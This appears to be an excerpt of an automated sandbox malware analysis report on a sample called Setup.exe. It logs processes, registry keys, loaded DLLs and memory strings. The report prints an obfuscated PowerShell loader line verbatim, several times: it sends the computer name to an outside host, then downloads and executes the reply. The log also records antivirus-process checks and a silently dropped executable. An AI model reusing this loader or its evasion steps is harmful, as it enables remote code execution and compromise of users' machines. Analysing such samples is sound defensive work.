              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
              Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: Setup.exe, 00000000.00000003.1799770983.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811531947.00000000034D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exeVirustotal: Detection: 13%
              Source: Setup.exeReversingLabs: Detection: 31%
              Source: Setup.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Setup.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Setup.exeString found in binary or memory: /LoadInf=
              Source: Setup.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp "C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$20460,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeProcess created: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp "C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$B0060,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; FgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp "C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$20460,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeProcess created: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp "C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$B0060,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: uxtheme.dllJump to behavior
